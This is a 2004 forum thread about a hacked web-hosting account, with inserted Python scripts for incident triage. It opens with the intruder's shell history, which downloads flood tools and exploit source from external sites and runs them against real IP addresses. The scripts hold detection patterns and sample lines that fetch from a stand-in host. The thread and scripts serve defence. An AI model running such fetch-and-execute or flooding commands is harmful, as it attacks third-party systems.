chmod +x f3
./f3 200.228.76.178 500 180
id
cd .s
./f3 200.97.201.28 500 180
./f3 200.97.201.28 500 300
ls
ls -a
mkdir .l
cd .l
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x vadimI
./vadimI
ls
./vadimI 66.221.169.110 80 66.221.169.11
ps
kill 20441
ps
kill -9 20322
ps
kill -9 20323
ps
cd .l
ls
./vadimI 66.221.169.110 80 66.221.169.110
./vadimI 66.235.202.52 80 66.235.202.5
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
./f3
./f3 200.221.8.44 500 300
./f3 200.226.137.9 1000 300
./f3 200.223.39.2 1000 100
ls
cd .l
./vadimI
./vadimI 200.192.176.133 80 200.192.176.133
ps
kill 15811
kill -9 14844
kill -9 14845
kill -9 14844
kill -9 15535
ls
ls -a
w
tty
uname -a
ping
mkdir .k
cd .k
ls
wget http://www.luckyan.com/r00t/flood.tgz
tar xfv flood.tgz
tar xzvf flood.tgz
cd dos
ls
./slice2
chmod +x *
./slice2
cd ..
wget http://mihai-doini.org/flood.tgz
ls
rm *
wget http://mihai-doini.org/flood.tgz
tar xzvf flood.tgz
cd flood
ls
chmod +x
chmod +x *
./sl
ls
ls s*
./slice3
./sl3
./stream
ls
./xdestroy
./udp
./juno
./juno 200.222.173.87 139
./xshock
ls
./rc8
./rc8 200.222.173.87
./rc8 200.222.173.87 200.222.173.87
./s
ls
./smack
./smack 200.222.173.87
./alpha
./alpha 200.222.173.87 139 200.222.173.87
l
ls
./nestea
./da.sh
ls
ls -a
cd .k
ls
rm -rf f*
cd dos
ls
mv vadimI ..
cd ..
ls
rm -rf dos
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.188.191.131 80 200.188.191.13
./vadimI 200.188.191.131 80 200.188.191.13
./f3 200.188.191.131 1000 300
./f3 200.188.191.131 1000 300
ps
kill -9 11654
kill -9 15977
ps
./vadimI 200.208.28.224 80 200.208.28.22
ps
kill 16235
ps
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
ls
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
./f3 200.99.102.226
./f3 200.99.102.226 500 300
./f3 200.99.102.226 1000 300
./f3 200.99.102.226 1000 300
ls
ls -a
ps
setterm -file `perl -e 'print "A"x249'`
setterm
setterm -file `perl -e 'print "A"x249'`
./vadimI 66.90.122.94 6667 66.90.122.80
cd ....
./vadimI 66.90.122.94 6667 66.90.122.80
./vadimI 66.90.122.94 6667 66.90.122.80
id
ls
ls -a
cd ....
ls
wget http://nene.nu/c4
chmod +x c4
./c4
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94
./c4 -h 66.90.122.94 -p 6665,6667
cd ....
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 66.90.122.94 1000 300
ls
./vadimI 207.44.244.102 80 207.44.244.10
ps
ls
ls -a
wget eagle.kecapi.com/sec/codes/phpmy-explt.c
gcc -o phpmyphpmy-explt.c
mkdir ....
mv phpmy-explt.c ....
cd ....
ls
gcc
traceroute
ls -a
mkdir .h
ls -a
cd .h
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
ls
unzip vadimI.zip
./v
rm -rf *.zip
chmod +x *
./v
./vadimI
./f3216.239.39.10465535 600
./f3 200.152.253.20 1000 600
id
uanme -a
showmount
ls
ls -a
pwd
ps
ls
ls -a
mkdir .c
cd .c
pwd
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
rm *.zip
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
rm *.zip
chmod +x *
ls
./vadimI 24.61.211.193 80 24.61.211.19
w
ls
ps
ps
ps
ls
ls -a
mkdir .l
cd .l
wget http://packetstormsecurity.nl/DoS/udp.pl
chmod +x *
./udp.pl
./udp 200.222.175.87 139 1
./udp.pl 200.222.175.87 139 1
3ps
ps
cd ....
ls
perl udp.pl 200.222.169
ls
ls -pa
ls -a
mkdir ....
cd ....
wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl
chmod +x *
./udp.pl 201.5.121
perl udp.pl 201.5.121
ps
killall -9 perl
ps
ls
cd ....
ls
rm u*
ls
ps
killall -9 vadimI
ps
ls -a
cd ....
ls
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
rm *.zip
ls
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
ls
ls -a
cd ....
ls
./vadimI 66.90.84.99 6667 66.90.84.9


but but but, THAT IS MY ACCOUNT!!!!
How did he do this? Does he have SSH access or what? What can I do now? Disable SSH for this account? Can I disable all SSH access for this account in WHM....
But I changed the password for this account....
Did he use some bad PHP/Perl script for this or what? How can I find that....?
Thanks.

ppuru 07-17-2004 10:53 PM

Quote:

Does he have SSH access or what? What can I do now? Disable SSH for this account? Can I disable all SSH access for this account in WHM
Read Capt_caveman's red-lettered advice. Take the system off the net.

Your best bet would be to put in a fresh system that is armoured to the teeth.

The attacker could have made several ways available to her(him)self to regain access to your system. So, disabling ssh or changing your password or root password may not be entirely effective.

Capt_Caveman 07-18-2004 12:05 AM

The bash_history shows a mix of downloading DoS tools and Linux root exploits (i.e. mremap and ptrace) as well as creation of a number of "hidden" dirs like ... or .l or .k etc. From the bash_history, it's hard to tell if any of the privilege escalation attacks were successful. Again, check the system logs for any application/kernel errors, oops, segfaults, or panics.

As far as how access is attained, that depends on what services are being run (ssh, telnet, etc). Take a look at the output of last and at /var/log/secure and look for abnormal login info or logins that correspond to odd activity. You can try turning off ssh, but I was assuming that's how you accessed the system. You can try denying the user access by modifying the sshd config file and adding the DenyUsers <username> directive. Though I'd assume since you are the compromised user, that you'd lock yourself out. If you have an alternative account then you'd still be able to login (just don't tell me it's root).

So far you haven't really given us enough info to say how access to your account was attained. It could be a sniffed password, insecure cgi script, some other vuln...hard to say exactly without any real evidence.
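
One way to skim a long .bash_history like the one quoted above the way Capt_Caveman reads it (downloads, hidden directories, what was run and against which addresses). This is an added example, not code from the thread or from any tool mentioned in it; the history it parses is constructed, with the tool names from the thread but a reserved .invalid host and documentation-range IPs in place of the real ones:

```python
import posixpath
import re
from collections import Counter

# Constructed sample history, modelled on the kind of session quoted in the
# thread. Tool names echo the thread; the host uses a reserved .invalid domain
# and the IPs are documentation ranges, so nothing here points at a real site.
SAMPLE_HISTORY = """\
cd /var/tmp
ls -a
mkdir ....
cd ....
wget http://dropsite.invalid/tools/f3
wget http://dropsite.invalid/tools/vadimI.zip
unzip vadimI.zip
chmod +x *
./f3 198.51.100.7 1000 300
ps
kill -9 31240
id
uname -a
mkdir .k
cd .k
./vadimI 203.0.113.5 80 203.0.113.1
killall -9 vadimI
exit
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
DOWNLOADERS = {"wget", "curl", "lynx", "fetch"}
RECON = {"id", "uname", "w", "who", "ps", "last", "netstat", "pwd", "tty", "showmount"}
PROCESS_KILLERS = {"kill", "killall", "pkill"}


def triage_history(text):
    """Summarise a shell history into what an incident responder wants first:
    what was fetched, where it was hidden, what was run and against whom."""
    summary = {
        "downloads": [],          # every URL handed to a downloader
        "fetched_names": set(),   # basenames of fetched files and unpacked archives
        "hidden_dirs": [],        # mkdir of dot-prefixed names (... .k .l and so on)
        "executed": [],           # (program run as ./prog, [IPv4 arguments])
        "kills": [],              # process cleanup, often of the attacker's own tools
        "recon": Counter(),       # id / uname / w / ps ... usage
    }
    for raw in text.splitlines():
        argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd in DOWNLOADERS:
            for url in (a for a in args if not a.startswith("-")):
                summary["downloads"].append(url)
                summary["fetched_names"].add(posixpath.basename(url))
        elif cmd == "unzip":
            # unzip foo.zip normally yields foo; record it so a later ./foo is linked back
            for a in args:
                summary["fetched_names"].add(posixpath.splitext(posixpath.basename(a))[0])
        elif cmd == "mkdir":
            summary["hidden_dirs"].extend(a for a in args if posixpath.basename(a).startswith("."))
        elif cmd.startswith("./") and len(cmd) > 2:
            summary["executed"].append((cmd[2:], [a for a in args if IPV4.match(a)]))
        elif cmd in PROCESS_KILLERS:
            summary["kills"].append(raw)
        elif cmd in RECON:
            summary["recon"][cmd] += 1
    return summary


def executed_downloads(summary):
    """Names that were both fetched from the network and later run: the core of the incident."""
    ran = {prog for prog, _ in summary["executed"]}
    return sorted(summary["fetched_names"] & ran)


def targets_hit(summary):
    """Distinct IPv4 addresses passed to the downloaded tools: third parties that
    were attacked from this box and whose owners should be notified."""
    ips = set()
    for prog, ip_args in summary["executed"]:
        if prog in summary["fetched_names"]:
            ips.update(ip_args)
    return sorted(ips)


if __name__ == "__main__":
    s = triage_history(SAMPLE_HISTORY)
    print("fetched and run:", executed_downloads(s))
    print("hidden dirs:", s["hidden_dirs"])
    print("targets:", targets_hit(s))
```

Run it against the real file with `triage_history(open(".bash_history").read())`. The history only records what the shell saw, so a tool that never shows up in `executed_downloads` may still have run; treat the output as a list of leads to confirm against `last`, the system logs and the contents of /tmp and /var/tmp, not as a verdict.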


xmanxl 07-18-2004 05:46 AM

Yes, on my server he can access with ssh/telnet...
When I edit /var/log/secure I find:
Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13914]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13890]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13892]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13915]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13916]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13891]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13893]: Did not receive identification string from IP

every few days I have this...or every day...

Yes, I can't turn off ssh...but I can add "DenyUsers <username>"
Yes, I have root access....

Also, if I see correctly in .bash_history, he works directly in /var/tmp, he doesn't change dir (cd some_dir, cd .. ...), he only creates one folder, downloads a file, extracts and executes that file...
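
The /var/log/secure lines above are the kind of thing Capt_Caveman suggests reading, and they split into two different signals: a burst of "Did not receive identification string" from one address in the same second is a scanner or banner-less probe that never logged in, while "Accepted ... for user from IP" lines are the actual logins to line up against the timestamps in .bash_history. This added example (not from the thread) parses both in the standard OpenSSH log format; the log it works on is constructed, with documentation-range addresses in place of the "IP" the post redacted, and the user names are made up:

```python
import re
from collections import Counter, defaultdict

# Constructed sample modelled on the lines posted above. The post redacted the
# source as "IP"; these addresses are documentation ranges and the users are invented.
SAMPLE_SECURE_LOG = """\
Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from 198.51.100.23
Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from 198.51.100.23
Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from 198.51.100.23
Jul 16 19:50:01 plain sshd[13890]: Did not receive identification string from 198.51.100.23
Jul 16 19:50:01 plain sshd[13891]: Did not receive identification string from 198.51.100.23
Jul 16 21:12:44 plain sshd[14102]: Accepted password for webuser from 203.0.113.9 port 41522 ssh2
Jul 17 02:03:10 plain sshd[15211]: Accepted password for webuser from 198.51.100.77 port 2201 ssh2
Jul 17 02:05:33 plain sshd[15230]: Failed password for root from 198.51.100.77 port 2204 ssh2
Jul 17 02:05:40 plain sshd[15231]: Failed password for invalid user oracle from 198.51.100.77 port 2205 ssh2
Jul 17 09:30:00 plain sshd[16001]: Accepted publickey for admin from 203.0.113.9 port 50000 ssh2
"""

# syslog timestamp, host and the sshd[pid]: prefix shared by every line
PREFIX = r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[(?P<pid>\d+)\]: "
PATTERNS = {
    "noident": re.compile(PREFIX + r"Did not receive identification string from (?P<ip>\S+)"),
    "accepted": re.compile(PREFIX + r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+"),
    "failed": re.compile(PREFIX + r"Failed (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"),
}


def parse_sshd_log(text):
    """Turn sshd lines into event dicts; lines matching none of the patterns are skipped."""
    events = []
    for line in text.splitlines():
        for kind, pat in PATTERNS.items():
            m = pat.match(line)
            if m:
                ev = m.groupdict()
                ev["kind"] = kind
                events.append(ev)
                break
    return events


def probe_bursts(events, threshold=3):
    """Sources that opened `threshold` or more connections without ever sending an
    SSH banner. A burst of these in one second is a port scanner or availability
    probe; on its own it is noise, not evidence of a login."""
    counts = Counter(e["ip"] for e in events if e["kind"] == "noident")
    return {ip: n for ip, n in counts.items() if n >= threshold}


def logins_by_user(events):
    """Every address each account has successfully logged in from."""
    by_user = defaultdict(set)
    for e in events:
        if e["kind"] == "accepted":
            by_user[e["user"]].add(e["ip"])
    return {u: sorted(ips) for u, ips in by_user.items()}


def unexpected_logins(events, known_ips):
    """Successful logins from outside the operator's own allowlist: the lines whose
    timestamps to compare with the activity in .bash_history."""
    return [(e["ts"], e["user"], e["ip"], e["method"])
            for e in events if e["kind"] == "accepted" and e["ip"] not in known_ips]


def failures_from(events, ip):
    """Accounts a given source tried and failed on (password guessing leaves this trail)."""
    return [e["user"] for e in events if e["kind"] == "failed" and e["ip"] == ip]


if __name__ == "__main__":
    evs = parse_sshd_log(SAMPLE_SECURE_LOG)
    print("probe bursts:", probe_bursts(evs))
    print("logins:", logins_by_user(evs))
    print("unexpected:", unexpected_logins(evs, {"203.0.113.9"}))
```

The allowlist passed to `unexpected_logins` is whatever addresses you yourself log in from; a successful login from anywhere else, for the account whose history shows the downloads, is the line that tells you when and from where the session started, which is what you need to decide whether a sniffed or guessed password explains the access.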

Proud 07-18-2004 05:48 AM

Will you please take your bloody server offline already!

xmanxl 07-18-2004 07:36 AM

No, I can't do that for too much time...I'll lose everything I worked on for a very long time...and also I have people who pay me...

Can somebody tell me how I can disable wget for this account (only one account)? Not for all accounts!

This can help....also, I changed some more things and I'll now edit all scripts for that account!

Thanks

Proud 07-18-2004 07:46 AM

Ok, so you're renting this server off of another company, and providing hosting services to many sites. So people are paying you to provide a reliable service, but atm you're knowingly allowing another company's machines to participate in Denial of Service attacks on other internet users.

You MUST inform your server provider of the break in, and ask them to backup your data and reinstall the OS, as the Mods here have told you repeatedly. You won't have anything if this guy decides to completely take control of your precious server and all its hosted sites, so show some action, NOW!

stickman 07-18-2004 10:21 AM

Quote:

Originally posted by xmanxl
No, I can't do that for too much time...I'll lose everything I worked on for a very long time...and also I have people who pay me...

OK, by refusing to take the system offline to fix the problem, you are continuing to put yourself and possibly the people who pay you at risk.

rash 08-19-2004 02:38 PM

The bug is in the PHP of your site. Turn on safe_mode in your php.ini config file, then restart Apache. Locate any suspicious .php files on your web server that have functions like system(), and search for the string wget in your Apache logs to find the intruder's IP.


Upgrade the version of your kernel; some versions of the 2.4 kernels have a bug that allows exploiting the kernel and gaining root access. Verify the ports open on your system and whether there are suspicious executables in ps.

Regards.
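
The two checks rash suggests, done a little more carefully than a plain grep: scan PHP sources for the functions that hand a string to a shell (and whether the same file reads request variables), and scan the Apache access log for requests whose decoded query string carries a download command or shell metacharacters, rather than any request that merely contains the letters "wget". This is an added example, not code from the thread; the PHP snippets and log lines are constructed (a .invalid host, documentation-range addresses, invented file names), and one benign request with "wget" in a filename is included to show the false positive a bare grep would raise:

```python
import re
from urllib.parse import unquote_plus

# PHP constructs through which a web script can run shell commands.
# A hit is a lead to read, not proof of a backdoor.
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
CALL_RE = re.compile(r"(?<![\w$])(" + "|".join(SHELL_FUNCS) + r")\s*\(", re.IGNORECASE)
BACKTICK_RE = re.compile(r"`[^`\n]+`")          # `cmd` is shell_exec in disguise
REQUEST_VARS = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")

# Constructed sample sources (not from any site in the thread).
SAMPLE_PHP = {
    "contact.php": "<?php mail($to, $subject, $body); ?>",
    "counter.php": "<?php $f = fopen('hits.txt', 'a'); ?>",
    "tools.php": "<?php $cmd = $_GET['cmd']; echo system($cmd); ?>",   # shell fed from the request
    "backup.php": "<?php $out = `tar czf /tmp/b.tgz /var/www`; ?>",    # backtick execution, fixed command
}


def find_shell_calls(sources):
    """Map filename -> shell-execution constructs found, plus whether the file also
    reads request variables; files with both are the ones to read first."""
    hits = {}
    for name, code in sources.items():
        found = [m.group(1).lower() for m in CALL_RE.finditer(code)]
        if BACKTICK_RE.search(code):
            found.append("backtick")
        if found:
            hits[name] = {"calls": found, "reads_request": bool(REQUEST_VARS.search(code))}
    return hits


# Apache combined/common log: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# a downloader used as a command: preceded by start/separator and followed by whitespace or end,
# so "file=wget-manual.pdf" does not match but "cmd=cd /var/tmp;wget http://..." does
DOWNLOADER_CMD = re.compile(r"(?:^|[;|&=\s`$(])(?:wget|curl|lynx|fetch)(?:\s|$)")
METACHARS = re.compile(r"[;|&`$]")

# Constructed sample log; .invalid host and documentation-range addresses.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [16/Jul/2004:19:52:10 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.77 - - [16/Jul/2004:21:10:02 +0200] "GET /tools.php?cmd=cd%20/var/tmp;wget%20http://dropsite.invalid/f3 HTTP/1.0" 200 312 "-" "Lynx/2.8"
198.51.100.77 - - [16/Jul/2004:21:10:30 +0200] "GET /tools.php?cmd=chmod%20%2Bx%20f3 HTTP/1.0" 200 12 "-" "Lynx/2.8"
203.0.113.9 - - [17/Jul/2004:08:00:00 +0200] "GET /downloads.php?file=wget-manual.pdf HTTP/1.1" 200 90000 "-" "Mozilla/5.0"
"""


def suspicious_requests(log_text):
    """Requests whose URL-decoded query string contains a download command or shell
    metacharacters. Returns (ip, timestamp, decoded target, reasons)."""
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote_plus(m.group("target"))
        query = target.partition("?")[2]
        reasons = []
        if DOWNLOADER_CMD.search(query):
            reasons.append("downloader")
        if METACHARS.search(query):
            reasons.append("metachars")
        if reasons:
            out.append((m.group("ip"), m.group("ts"), target, reasons))
    return out


def requests_from(log_text, ip):
    """Every decoded request a given source made: once a tool has been fetched it can
    be run again by a request that contains no 'wget' at all."""
    return [unquote_plus(m.group("target"))
            for m in (LOG_RE.match(l) for l in log_text.splitlines())
            if m and m.group("ip") == ip]


if __name__ == "__main__":
    print(find_shell_calls(SAMPLE_PHP))
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print(hit)
        print("  all requests from", hit[0], requests_from(SAMPLE_ACCESS_LOG, hit[0]))
```

Note what the sample shows: the second request from 198.51.100.77 (`chmod +x f3`) is not flagged on its own, which is why the follow-up is to pull every request that address made once any one of them is flagged. To run this on a real site, read the PHP files into a dict with `{path: open(path).read()}` and pass the access log text to `suspicious_requests`.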

